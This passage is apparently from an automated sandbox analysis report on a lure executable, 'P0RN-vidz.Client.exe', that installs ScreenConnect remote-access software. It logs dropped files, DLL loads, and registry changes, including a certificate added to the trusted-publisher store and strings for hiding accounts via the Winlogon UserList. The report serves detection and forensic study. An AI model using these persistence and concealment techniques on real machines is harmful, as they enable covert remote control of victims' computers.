                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: P0RN-vidz.Client.exe Static PE information: certificate valid
                  Source: P0RN-vidz.Client.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: P0RN-vidz.Client.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: P0RN-vidz.Client.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: P0RN-vidz.Client.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: P0RN-vidz.Client.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: P0RN-vidz.Client.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: P0RN-vidz.Client.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: P0RN-vidz.Client.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: P0RN-vidz.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26ECB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26B68000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2523805128.0000000002BE2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.3279854625.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.3279616010.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.2517771786.000000000008D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270DE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D14000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2530636996.000000001BEC2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D19000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270E2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527690539.0000000002ED2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A09000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D19000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270E2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527690539.0000000002ED2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A09000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: System.pdb source: ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26B6C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2524088311.0000000005242000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: P0RN-vidz.Client.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: P0RN-vidz.Client.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: P0RN-vidz.Client.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: P0RN-vidz.Client.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: P0RN-vidz.Client.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr Static PE information: 0x82BC4119 [Mon Jul 4 06:58:33 2039 UTC]
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exe Code function: 0_2_00371000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00371000
                  Source: P0RN-vidz.Client.exe Static PE information: real checksum: 0x20116 should be: 0x1f7b8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..core_4b14c015c87c1ad8_0018.0004_none_53e91df7fcfd4a60\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..dows_4b14c015c87c1ad8_0018.0004_none_5860f5d9394b5d90\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..vice_4b14c015c87c1ad8_0018.0004_none_053cb64092bcadcb\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9fe7bca0c4ca064\ScreenConnect.Client.dllJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (efdde9f7-b36a-4379-90c6-ca6ccaf179c1)

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2530636996.000000001BEC2000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.2523805128.0000000002BE2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.3279854625.00000000026E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.3279616010.00000000024A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
